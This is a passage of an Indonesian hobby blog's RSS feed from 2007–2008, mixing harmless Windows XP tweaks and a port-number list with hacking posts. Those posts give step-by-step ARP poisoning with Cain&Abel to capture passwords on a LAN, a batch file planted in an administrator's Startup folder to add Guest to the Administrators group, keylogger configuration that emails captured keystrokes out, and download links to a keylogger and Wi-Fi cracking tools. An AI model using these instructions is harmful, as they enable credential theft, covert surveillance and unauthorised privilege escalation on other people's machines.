url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaepmzMSQbYDPTr6wK3zVHKEK_JNORu1YUSLfsiMD5tt7cX0T2kh4mlp35ayX8SCjSbQV6xQgVUm54A8vXHa0H7Tgw5PkmySe1NlOPNbCanIArAehpNtTsGa5AzItJ1aK15koCeulyTxs/s72-c/iviewcapture_date_14_03_2008_time_16_12_44.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-6664044772165824782</guid><pubDate>Mon, 10 Mar 2008 06:23:00 +0000</pubDate><atom:updated>2009-03-12T20:26:22.603-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Modifikasi System Informasi Properties</title><description>Pernahkan Anda Memperhatikan System Informasi Properties (Contol Panel/System/System Properti)? Yang terlihat hanya informasi tentang OS dan Service Pack, kan?&lt;br /&gt;Tapi jangan khawatir karena sekarang saya akan membahas tentang bagaimana caranya memodifikasi semua itu.&lt;br /&gt;caranya: buka notepad...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Copy &lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;              Script Di Bawah ini&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;[General]&lt;br /&gt;                          Manufacturer=CordWeapon&lt;br /&gt;                                    Model=BlackSignal&lt;br /&gt;                                        [Suport Information]&lt;br /&gt;                                         Line1=Bagi pengguna kompy ini&lt;br /&gt;                                         Line2=Tolong jangan ubah Setting apapun&lt;br /&gt;                                         Line3=Maaf ya...&lt;br /&gt;                                        Line4=Ini demi kebaikan bersama&lt;br /&gt;&lt;br /&gt;               &lt;br /&gt;                   &lt;br /&gt;simpan dengan dengan nama &lt;span style="font-style: italic;"&gt;oeminfo.ini&lt;/span&gt; kemudian simpan di&lt;br /&gt;c:\windows\system =====&gt; untuk windows 95/98&lt;br /&gt;c:\winnt\system32 =====&gt; untuk windows NT&lt;br /&gt;c:\windows\system32 ===&gt; untuk windows XP&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;kemuadian untuk memberikan image pada kotak informasi tadi, caranya:&lt;br /&gt;siapkan gambar dengan format .bmp dan ukurannya 180x114 pixel. Ingat...format nya harus bmp, jika anda mempunya gambar dengan format lain, silahkan konversikan dulu menggunakan image editor kesukaan Anda.&lt;br /&gt;Setelah itu simpan dengan nama &lt;span style="font-style: italic;"&gt;oemlogo.bmp&lt;/span&gt; dan letakan di tempat tadi (tempat Anda menyimpan file oeminfo.ini)&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Selamat Mencoba</description><link>http://xpemula.blogspot.com/2008/03/modifikasi-system-informasi-properties.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-4315877437478937490</guid><pubDate>Fri, 25 Jan 2008 13:31:00 +0000</pubDate><atom:updated>2009-03-12T20:19:19.084-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Menyembunyikan Folder Options</title><description>Ada dua cara untuk menyembunyikan folder option dari menu win exolore, yang pertama dengan merubah setting pada system registry dan yang kedua dengan menggunakan bantuan gpedit console. Kali ini saya akan membahas bagaimana cara menyembunyikan folder options dengan metode yang kedua.&lt;br /&gt;Hal yang harus dilakukan:&lt;br /&gt;1. buka windows explorer&lt;br /&gt;2. &lt;em&gt;c:\windows\system32&lt;/em&gt;&lt;br /&gt;3. double klik gpedit yang berekstesi microsoft common console&lt;br /&gt;4. local computer policy&lt;em&gt;\user configuration\administrative templates\windows components\windows explorer&lt;/em&gt;&lt;br /&gt;5. pilih option “Remove the Folder Options menu item from the Tools menu”&lt;br /&gt;6. akan muncul sebuah dialog, pilih “enable” pada tab setting&lt;br /&gt;Klik Apply, Ok</description><link>http://xpemula.blogspot.com/2008/01/menyembunyikan-folder-options.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-1888152174999475539</guid><pubDate>Sat, 19 Jan 2008 08:06:00 +0000</pubDate><atom:updated>2009-03-12T20:23:27.792-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Sniffing dengan Cain&amp;Abel</title><description>&lt;div align="justify"&gt;Sebelum kita membahas tentang bagaimana cara melakukan aksi sniffing dalam sebuah jaringan LAN, ada baiknya kita mengetahui apa yang dimaksud dengan sniffing.&lt;br /&gt;Sniffing adalah sebuah aksi penyadapan. Melihat cara yang digunakan, sniffing dibagi kedalan dua kategori; passive sniffing yaitu melakukan penyadapan tanpa merubah data atau packet apapun dari jaringan sedangkan active sniffing merubah packet di jaringan atau mengirimkan packet dengan alamat MAC yang berubah-ubah secara acak dalam jumlah yang sangat banyak. Active sniffing biasanya menggunakan tool tambahan (yang biasa digunakan yaitu Etherflood), tapi kali ini kita hanya akan membahas bagaimana cara menggunakan passive sniffing dan tool yang kita gunakan adalah Cain&amp;amp;Abel.&lt;br /&gt;Cain&amp;amp;Abel merupakan sebuah tool yang sangat popular dan cara penggunaannyapun sangat sederhana, untuk sedot Cain&amp;amp;Abel bisa diambil pada topik TOOLS.&lt;br /&gt;Langkah-langkah yang harus dilakukan:&lt;br /&gt;1. Install program Cain&amp;amp;Abel&lt;br /&gt;2. Jalankan Cain&lt;br /&gt;3. Untuk melakukan aksi sniffing, klik sub-tab Sniffer&lt;br /&gt;4. Klik sub-tab APR&lt;br /&gt;5. Klik menu Configure – akan muncul configure dialog yang berisi tentang beberapa sub-tab configuration – klik tab Sniffer – akan tampak beberapa keterangan tentang Adapter, IP Address dll – klik satu baris di bawah menu-menu tadi yang berisi keterangan IP Address komputer kita, MAC dll – kemudian OK.&lt;br /&gt;6. Active kan Cain dengan mengklik tombol Start&lt;br /&gt;7. Agar komputer kita memiliki kemampuan routing, klik tombol Start APR&lt;br /&gt;8. Jalankan Command Prompt&lt;br /&gt;9. Lakukan komunikasi dengan komputer target dengan melakukan pinging terhadap IP Address komputer target, contoh c:\ping 192.168.0.2, dalam beberapa kasus kita harus melakukan pinging (menurut pengalaman saya, pinging merupakan cara tercepat untuk melakukan komunikasi dengan komputer target) lebih dari satu komputer, hal itu bertujuan untuk menjadikan komputer lain sebagai gateway.&lt;br /&gt;10. Pada Cain ada dua bagian tabel yang bermenu sama Status, IP Address, MAC Address dll. Untuk memulai, klik tabel bagian atas (router area), kemudian klik tanda plus (Add to list)&lt;br /&gt;11. Akan muncul dialog New ARP Poison Routing. Klik IP Address komputer target yang ada di kolom sebelah kiri dan klik IP Address komputer gateway pada kolom sebelah kanan. Klik OK&lt;br /&gt;Setelah IP Address masuk ke dalam list, kita tinggal menunggu lalu lintas packet yang tertangkap oleh Cain. Untuk mengetahui hasil yang tertangkap, klik tab passwords.&lt;br /&gt;&lt;br /&gt;- Cara kerja dari Cain:&lt;br /&gt;Cain&amp;amp;Abel meracuni ARP tabel komputer target sehingga komunikasi antara komputer target dengan gateway harus melalui komputer kita.&lt;br /&gt;&lt;br /&gt;- Masalah yang sering ditemukan:&lt;br /&gt;Cain&amp;amp;Abel sering teridentifikasi sebagai virus oleh antivirus, hal ini dikarenakan antivirus menggunakan fasilitas heuristic yaitu menebak-nebak sebuah file sebagai virus, fungsi ini bertujuan untuk mengenali virus-virus baru yang belum terdeteksi oleh database antivirus. Namun fasilitas ini terkadang menjadi “false warning” dan menganggap program-program tertentu terutama hack tools sebagai virus, bahkan antivirus lain pun dianggap virus.&lt;br /&gt;&lt;br /&gt;- Bagaimana mencegah aksi snifing ini:&lt;br /&gt;Untuk mencegah aksi ini, lakukan perubahan pada ARP, dalam hal ini type dari ARP yang akan kita ganti dari &lt;strong&gt;dynamic&lt;/strong&gt; menjadi &lt;strong&gt;static&lt;/strong&gt;. Caranya : &lt;em&gt;c:\arp –s [IP Address] [MAC Address]&lt;/em&gt; dan untuk mengembalikan ke keadaan semula, ganti atribut &lt;em&gt;–s&lt;/em&gt; menjadi &lt;em&gt;-d&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Thanks to :&lt;br /&gt;S'to Jasakom&lt;br /&gt;&lt;a name="62043"&gt;&lt;/a&gt;hyp3rl1nk&lt;/div&gt;</description><link>http://xpemula.blogspot.com/2008/01/sniffing-dengan-cain.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-2818710759799594487</guid><pubDate>Sat, 15 Dec 2007 14:35:00 +0000</pubDate><atom:updated>2009-07-08T09:49:57.960-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Jaringan</category><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>TOOLS</title><description>Dibawah ini adalah beberapa link untuk mendownload tools yang mungkin dibutuhkan untuk berbagai kegiatan. Jika Anda membutuhkan, silahkan sedot.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Cain_&amp;amp;_Abel&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68015414/CainAbel.rar"&gt;http://rapidshare.com/files/68015414/CainAbel.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;T-Sight&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://rapidshare.com/files/68019221/T-Sight.rar"&gt;http://rapidshare.com/files/68019221/T-Sight.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Wireshark&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68019222/WireShark.rar"&gt;http://rapidshare.com/files/68019222/WireShark.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;KGB Keylogger&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68019223/KGB-Keylogger.rar"&gt;http://rapidshare.com/files/68019223/KGB-Keylogger.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Retina&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68019225/Retina5.rar"&gt;http://rapidshare.com/files/68019225/Retina5.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;GFI LANguard&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68023063/GFI_LANguard_Network_Security_Scanner.v7.0.rar"&gt;http://rapidshare.com/files/68023063/GFI_LANguard_Network_Security_Scanner.v7.0.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;The Killer Machine&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://rapidshare.com/files/68966958/TKM.rar"&gt;http://rapidshare.com/files/68966958/TKM.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;CommView for LAN&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://rapidshare.com/files/73071412/CommView_for_LAN.rar"&gt;http://rapidshare.com/files/73071412/CommView_for_LAN.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Etherflood&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://rapidshare.com/files/73070643/Etherflood.rar"&gt;http://rapidshare.com/files/73070643/Etherflood.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Etheral&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/73068374/Etheral.rar"&gt;http://rapidshare.com/files/73068374/Etheral.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;AirSnort&lt;br /&gt;&lt;/strong&gt;&lt;a href="http://rapidshare.com/files/68972163/AirSnort.rar"&gt;http://rapidshare.com/files/68972163/AirSnort.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Win Air Crack Pack&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/73070644/WinAircrackPack.rar"&gt;http://rapidshare.com/files/73070644/WinAircrackPack.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;NAT&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/73070641/nat.zip"&gt;http://rapidshare.com/files/73070641/nat.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;CommView for Wifi&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68970704/CommView_for_WiFi.rar"&gt;http://rapidshare.com/files/68970704/CommView_for_WiFi.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;DD-WRT&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/68974317/DD-WRT.rar"&gt;http://rapidshare.com/files/68974317/DD-WRT.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Semoga tools-tools diatas dapat membantu pekerjaan Anda.&lt;/em&gt;</description><link>http://xpemula.blogspot.com/2007/12/tools.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-894017435527807964</guid><pubDate>Mon, 19 Nov 2007 20:16:00 +0000</pubDate><atom:updated>2007-11-19T12:29:33.039-08:00</atom:updated><title>Dari Guest Jadi Admin pada Win XP</title><description>Pada windows XP atau 2000, seorang user Guest dapat merampas posisi Administrator untuk kemudian diduduki.&lt;br /&gt;&lt;br /&gt;caranya:&lt;br /&gt;tulis script di bawah ini..."pake notepad aja biar gampang"&lt;br /&gt;&lt;br /&gt;&lt;em&gt;@echo off&lt;/em&gt;&lt;br /&gt;&lt;em&gt;net localgroup Administrator Guest/Add&lt;/em&gt;&lt;br /&gt;&lt;em&gt;Exit&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;kemudian simpan file tersebut (nama file terserah) dengan ekstensi BAT. Contoh: desktops.bat , ingat yang penting ekstensi file harus BAT.&lt;br /&gt;&lt;br /&gt;Lalu simpan file tersebut di &lt;em&gt;C:\Documents and Settings\"AdminName"\Start Menu\Programs\Startup&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Untuk menjalankan program tsb, restart kompy anda.</description><link>http://xpemula.blogspot.com/2007/11/dari-guest-jadi-admin-pada-win-xp.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-3676734701286400662</guid><pubDate>Sun, 18 Nov 2007 11:10:00 +0000</pubDate><atom:updated>2007-11-18T03:18:51.632-08:00</atom:updated><title>Mengoptimalkan Windows XP</title><description>&lt;div align="justify"&gt;Saat ini windows XP cukup diminati, itu diakrenakan XP menawarkan banyak sekali fitur yang tidak dimiliki oleh varian-varian sebelumnya. Namun demikian, keterbatasan hardware kerap kali menjadi kendala. Dalam hal ini, lambatnya kinerja computer.&lt;br /&gt;Ada dua cara untuk men-tune up computer agar kinerjanya lebih optimal. Yang pertama dengan mengubah setting registry dan yang kedua dengan melakukan setting pada menu-menu yang memang telah disediakan oleh XP.&lt;br /&gt;Kali ini kita akan membahas mengenai cara men-tune up dengan menggunakan metode yang kedua .&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Optimalkan memori&lt;/strong&gt;&lt;/div&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;strong&gt;-         Matikan Indexing Services&lt;/strong&gt;&lt;br /&gt;Fitur ini berfungsi untuk mempercepat proses pencarian file atau folder yang tersimpan dalam kompy. Program ini cukup banyak memakan memori. Untuk mematikannya, bukalah windows explorer- klik kanan pada harddrive (c:) - properties - pada bagian bawah windows akan terlihat “&lt;em&gt;Allow Indexing Services to index this for faster searches&lt;/em&gt;” - hilangkan checklist pada opsi ini kemudian klik Ok. Akan muncul :&lt;em&gt;confirm attribute changes&lt;/em&gt;” pilihlah &lt;em&gt;Apply changes to c:\ subfolders and file&lt;/em&gt; - OK.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-         Optimalkan Pagefile&lt;br /&gt;&lt;/strong&gt;Pagefile adalah bagian kapasitas harddisk yang dicadangkan sebagai perpanjangan dari RAM sehingga seolah-olah computer mempunyai memori yang lebih besar dari RAM sesungguhnya.&lt;br /&gt;Sebagai patokan : jika RAM dibawah 512 makan 1,5 X RAM tapi jika RAM 512 atau lebih makan 1 X RAM.&lt;br /&gt;Untuk mengubah setting ini: Explorer - klik kanan pada My Computer - Properties - Advanced - pada bagian Performance klik Settings. Akan muncul dialog box &lt;em&gt;Performance Options&lt;/em&gt; - Advanced - Change. Kemuadian muncul dialog &lt;em&gt;Virtual memory&lt;/em&gt;. Pilih C: (drive yang berisikan pagefile). Samakan initial size dengan max size dengan patokan diatas. Kemudian klik Set - Ok - Ok -Ok. Jika computer meminta restart, maka restart lah.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-         Matikan Port nganggur&lt;/strong&gt;&lt;br /&gt;Untuk mempercepat booting, matikan port yang tidak terpakai. Caranya: control panel - System - Hardware - Device Manager - Ports - klik kanan pada port yang akan dimatikan - Disable - Yes.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Optimalkan Harddisk&lt;/strong&gt;&lt;/div&gt;&lt;strong&gt;&lt;/strong&gt;&lt;div align="justify"&gt;&lt;br /&gt;&lt;strong&gt;-         Gunakan mode DMA&lt;/strong&gt;&lt;br /&gt;&lt;em&gt;Direct Memory Access Mode&lt;/em&gt; yaitu alternative atau bias dikatakan regenerasi dari PIO (&lt;em&gt;Programmed Input/Output&lt;/em&gt;). DMA melakukan transfer data dari harddisk langsung ke memori sehingga prosesor bias berjalan lebih cepat. Untuk mengaktifkan mode DMA: Kontrol Panel - System - Hardware - Device Manager - klik ganda pada &lt;strong&gt;IDE ATA/ATAPI&lt;/strong&gt; Controllers - klik kanan Primary IDE Channel - Properties&lt;br /&gt;Advanced Settings - pada transfer mode pilih &lt;em&gt;DMA if available&lt;/em&gt;-Ok -restart computer anda.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-         Hapus isi folder windows prefetch&lt;/strong&gt;&lt;br /&gt;Folder prefetch berisi file rujukan dari program yang sering digunakan supaya saat kita mejalankan program tersebut akan lebih cepat mucul. Tapi jika file yang tersimpan dalam folder ini terlalu banyak justru akan membuat computer jadi lambat. Untuk menghapusnya : C:\WINDOWS\Prefetch&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-         Buang file hibernasi&lt;/strong&gt;&lt;br /&gt;File ini akan berguna bagi pengguna laptop karena file hibernasi akan menyimpan semua hal yang sedang dijalankan dan menyelamatkan segala yang sedang kita kerjakan ketika baterai mulai kehabisan daya. Tapi jika anda pengguna PC hal ini tidak bermanfaat karena kompy ana akan selalu terhubung ke l istrik. File ini memakan ruang sama dengan besaran RAM. Untuk menghapus file ini:&lt;br /&gt;Control Panel - Power Options - pilih tab Hibernate - uncheck pada opsi &lt;strong&gt;Enable Hibernation&lt;/strong&gt; -Ok.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;-         Kurangi ukuran Recycle Bin&lt;br /&gt;&lt;/strong&gt;File yang kita hapus akan tersimpan di Recycle Bin dengan tujuan agar sewaktu-waktu dapat kita kembalikan (restore). Secara default, Recycle Bin menghabiskan ruang 10% dari kapasitas harddisk. Untuk menguranginya, klik kanan pada Recycle Bin - Properties - pada tab Global akan terlihat Maximum size of recycle bin. Jika harddisk anda cukup besar, bisa disetting menjadi 3% tapi jika tidak, gunakanlah 5% - Apply.&lt;br /&gt;&lt;br /&gt;Tips lain: Jangan gunakan wallpaper, matikan update otomatis, hapus file dan program yang tidak terpakai, gunakan clean up dan defrag lah computer secara regular.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Catatan: Jika anda membutuhkan fitur-fitur diatas, maka biarkan ia tetap pada tempatnya..!!&lt;br /&gt; &lt;/div&gt;</description><link>http://xpemula.blogspot.com/2007/11/mengoptimalkan-windows-xp.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5514938048453379406</guid><pubDate>Thu, 08 Nov 2007 14:53:00 +0000</pubDate><atom:updated>2009-03-12T20:14:02.251-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virus</category><title>File doc Jadi EXE</title><description>&lt;p style="margin-bottom: 0cm;"&gt;Bagi anda yang memiliki kompy dengan jam terbang tinggi, sering keluar masuk data apalagi data itu berasal dari compy public seperti warnet atau rental lainnya, kecenderungan untuk terinfeksi virus sangatlah besar.&lt;/p&gt; &lt;p style="margin-bottom: 0cm;"&gt;Salah satu virus yang nyebelin (biasanya berasal dari rental) ialah kspoold. Virus ini mungkin tidak terlalu berbahaya karena ia tidak merusak system, tapi mengurangi kinerja compy cukup membuat kita BT…&lt;/p&gt; &lt;p style="margin-bottom: 0cm;"&gt;Dia menyerang file-file yang berekstensi doc dan merubahnya menjadi exe (application). Berhubung dia hanya merubah ekstensi file, banyak yang tidak menyadari kehadiran virus ini karena file yang terinfeksi virus sekalipun masih dapat dibuka.&lt;/p&gt; &lt;p style="margin-bottom: 0cm;"&gt;Lantas, bagaimana cara membasmi virus ini? Gunakan antivirus AVG!!! (saya pernah mencoba dengan antivir tapi tidak berhasil). Tapi sebelum scanning menggunakan AVG, ada langkah yang harus dilakukan untuk menyelamatkan data anda…”jika anda belum mempunyai backup), karena AVG akan menghapus file yang kedapatan bervirus.&lt;/p&gt; &lt;p style="margin-bottom: 0cm;"&gt;Caranya, bukalah file yang terinfeksi kemudian simpan (save as) dengan format “RTF “ (Rich Text Format) kemudian barulah di scan.&lt;/p&gt;</description><link>http://xpemula.blogspot.com/2007/11/file-doc-jadi-exe.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-6998505403302442743</guid><pubDate>Sat, 03 Nov 2007 05:51:00 +0000</pubDate><atom:updated>2007-11-02T23:03:31.405-07:00</atom:updated><title>KEYMAIL</title><description>Pada tulisan sebelumnya saya sudah membahas tentang Keylogger, kali ini saya akan mengulas tentang Keymail “salah satu aplikasi keylogger” yang dibuat dengan bahasa pemrograman C. kelebihan keymail ini selain penanamannya yang fleksibel juga dapat mengirimkan hasil tangkapannya melalui email, walaupun tidak semua email dapat digunakan.&lt;br /&gt;Untuk mencari SMTP yang Open Relay, dapat menggunakan perintah nslookup –querytype=mx mailserver contoh C:\&gt; nslookup –querytype=mx gmail.com (disini saya menggunakan gmail yang memang open relay). Kita membutuhkan ini untuk konfigurasi.&lt;br /&gt;Perhatikan potongan script dibawah ini:&lt;br /&gt;#define cmailserver “gsmtp163.google.com”&lt;br /&gt;#define cemailto “&lt;a href="mailto:black.signal7@gmail.com"&gt;black.signal7@gmail.com&lt;/a&gt;”&lt;br /&gt;#define cemailfrom “&lt;a href="mailto:black.signal7@gmail.com"&gt;black.signal7@gmail.com&lt;/a&gt;”&lt;br /&gt;#define LongLength 100&lt;br /&gt;#define FileName “sound.wav”&lt;br /&gt;#define SMTPlog “ring.wav”&lt;br /&gt;#define cemailSubject “Hasil”&lt;br /&gt;Script utuh bisa didapatkan di wesite &lt;a href="http://www.irongeek.com/"&gt;www.irongeek.com&lt;/a&gt; , disana diterangkan juga langkah-langkah yang harus dilakukan dan compailer yang dibutuhkan.&lt;br /&gt;Selamat Mencoba</description><link>http://xpemula.blogspot.com/2007/11/keymail.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5696714760563514087</guid><pubDate>Thu, 01 Nov 2007 09:31:00 +0000</pubDate><atom:updated>2009-03-12T20:16:09.027-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Jaringan</category><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>PORT NUMBER</title><description>&lt;strong&gt;Decimal                    Descript&lt;/strong&gt;&lt;br /&gt;1 ............................ ... TCP Port Service Multiplexer&lt;br /&gt;2 ............................ ... Management Utility&lt;br /&gt;3 ............................ ... Compression Process&lt;br /&gt;5 ............................ ... Remote Job Entry&lt;br /&gt;11 .......................... ... Active Users&lt;br /&gt;13 .......................... ... Daytime&lt;br /&gt;17 .......................... ... Quote of Day&lt;br /&gt;18 .......................... ... Message Send Protocol&lt;br /&gt;19 .......................... ... Character Generator&lt;br /&gt;20 .......................... ... File Transfer (Data)&lt;br /&gt;21 .......................... ... File Transfer (Control)&lt;br /&gt;22 .......................... ... SSH Remote Login Protocol&lt;br /&gt;23 .......................... ... Telnet&lt;br /&gt;24 .......................... ... Private Mail System&lt;br /&gt;25 .......................... ... Simple Mail Transfer Protocol (SMTP)&lt;br /&gt;29 .......................... ... MSG ICP&lt;br /&gt;31 .......................... ... MSG Authentication&lt;br /&gt;33 .......................... ... Display Support Protocol&lt;br /&gt;35 .......................... ... Private printer Server&lt;br /&gt;37 .......................... ... Time&lt;br /&gt;38 .......................... ... Route Access Protocol&lt;br /&gt;39 ......................... ... Resource Location Protocol&lt;br /&gt;42 .......................... ... Host Name Server&lt;br /&gt;43 .......................... ... Who is&lt;br /&gt;45 .......................... ... Message Processing Module&lt;br /&gt;48 .......................... ... Digital Audit Daemon&lt;br /&gt;49 .......................... ... Login Host Protocol&lt;br /&gt;50 .......................... ... Remote Mail Checking Protocol&lt;br /&gt;51 .......................... ... IMP Logical Address Maintenance&lt;br /&gt;52 .......................... ... XNS Time Protocol&lt;br /&gt;53 .......................... ... Domain Name Server&lt;br /&gt;57 .......................... ... Private Terminal Access&lt;br /&gt;59 .......................... ... Private File Service&lt;br /&gt;63 .......................... ... Who Is++&lt;br /&gt;66 .......................... ... Oracle SQL*NET&lt;br /&gt;67 .......................... ... Bootstrap Protocol Server&lt;br /&gt;68 .......................... ... Bootstrap Protocol Client&lt;br /&gt;69 .......................... ... Trivial File Transfer&lt;br /&gt;70 .......................... ... Gopher&lt;br /&gt;71 – 74 .................. ... Remote Job Service&lt;br /&gt;75 .......................... ... Private Dial Out Service&lt;br /&gt;79 .......................... ... Finger&lt;br /&gt;80 .......................... ... Word Wide Web HTTP&lt;br /&gt;81 .......................... ... HOSTS2 Name Server&lt;br /&gt;84 .......................... ... Common Trace Facility&lt;br /&gt;87 .......................... ... Private Terminal Link&lt;br /&gt;88 .......................... ... Karberos&lt;br /&gt;89 .......................... ... SU/MIT Telnet Gateway&lt;br /&gt;92 .......................... ... Network Printing Protocol&lt;br /&gt;93 .......................... ... Device Control Protocol&lt;br /&gt;99 .......................... ... Metagram Relay&lt;br /&gt;101 ........................ ... NIC Host Name Server&lt;br /&gt;103 ........................ ... Genesis Point-to-Point Trans Net&lt;br /&gt;105 ........................ ... CCSO Name Server Protocol&lt;br /&gt;107 ........................ ... Remote Telnet Service&lt;br /&gt;108 ........................ ... SNA Gateway Access Server&lt;br /&gt;111 ........................ ... SUN Remote Procedure Call&lt;br /&gt;112 ........................ ... MclDAS Data Transmission Protocol&lt;br /&gt;113 ........................ ... Authentication Service (Ident)&lt;br /&gt;115 ........................ ... Simple File Transfer Protocol&lt;br /&gt;117 ........................ ... UUCP Path Service&lt;br /&gt;118 ........................ ... SQL Service&lt;br /&gt;119 ........................ ... Network News Transfer Protocol (NNTP)&lt;br /&gt;123 ........................ ... Network Time Protocol&lt;br /&gt;125 ........................ ... Locus PC-Interface Net Map Server&lt;br /&gt;126 ........................ ... Unisys Unitary Login&lt;br /&gt;127 ........................ ... Locus PC-Interface Conn Server&lt;br /&gt;129 ............................ Password Generator Protocol&lt;br /&gt;130 ............................ Cisco FNATIVE&lt;br /&gt;132 ............................ Cisco SYSMAINT&lt;br /&gt;133 ............................ Statistic Service&lt;br /&gt;134 ............................ INDRES-NET Service&lt;br /&gt;135 ............................ DCE Endpoint Resolution&lt;br /&gt;137 ............................ NETBIOS Naming Service&lt;br /&gt;138 ............................ NETBIOS Datagram Service&lt;br /&gt;139 ............................ NETBIOS Session Service&lt;br /&gt;143 ........................ Internet Message Access Protocol&lt;br /&gt;159 ........................ NSS-Routing&lt;br /&gt;160 ............................ AGMP-TRAPS&lt;br /&gt;161 ............................ SNMP&lt;br /&gt;162 ........................ SNMPTRAP&lt;br /&gt;169 ........................ Send&lt;br /&gt;170 ........................ Network PostScript&lt;br /&gt;177 ............................ X Display Manager Control Protocol&lt;br /&gt;178 ............................ NextStep Window Server&lt;br /&gt;194 ............................ Internet Relay Chat Protocol&lt;br /&gt;204 ............................ Apple Talk Echo&lt;br /&gt;218 ............................ Netix Message Posting Protocol&lt;br /&gt;220 ........................ Interactive Mail Access Protocol v3&lt;br /&gt;260 ............................ Openport&lt;br /&gt;280 ........................ HTTP-MGMT&lt;br /&gt;282 ........................ Cable Port A/X&lt;br /&gt;406 ........................ Interactive Mail Support Protocol&lt;br /&gt;443 ........................ HTTP Protocol Over TLS/SSL&lt;br /&gt;470 ........................ SCX-Proxy&lt;br /&gt;488 ........................ GSS-HTTP&lt;br /&gt;489 ........................ Nest-Protocol&lt;br /&gt;520 ........................ Router&lt;br /&gt;521 ........................ Rping&lt;br /&gt;531 ........................ Chat&lt;br /&gt;551 ........................ CyberCash&lt;br /&gt;586 ........................ Password Change&lt;br /&gt;592 ............................ Eudora Set&lt;br /&gt;593 ........................ HTTP RPC EP Map&lt;br /&gt;614 ........................ SSLshell&lt;br /&gt;615 ........................ Internet Configuration Manager&lt;br /&gt;648 ........................ Registry Registar Protocol (RRP)&lt;br /&gt;652 ........................ HELLO_PORT&lt;br /&gt;989 ........................ 